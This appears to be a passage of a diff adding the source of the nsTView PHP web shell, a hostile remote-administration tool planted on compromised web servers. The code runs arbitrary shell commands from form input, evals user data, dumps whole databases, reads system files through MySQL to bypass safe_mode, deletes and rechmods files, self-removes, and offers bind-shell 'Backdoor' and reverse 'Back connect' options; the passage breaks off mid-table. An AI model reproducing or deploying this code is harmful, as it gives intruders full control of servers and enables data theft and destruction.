+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
+";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>";
+print `$sh3`;
+echo "</pre>";
+}
+}
+
+if(@$_GET['sh311']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>"; print `$sh3`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+
+# You can put here preg_match_all for other distrib/os
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+
+
+print "<br><b>PS Table :: Fast kill program<br>
+(p.s: Tested on Linux slackware 10.0)<br>
+<br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
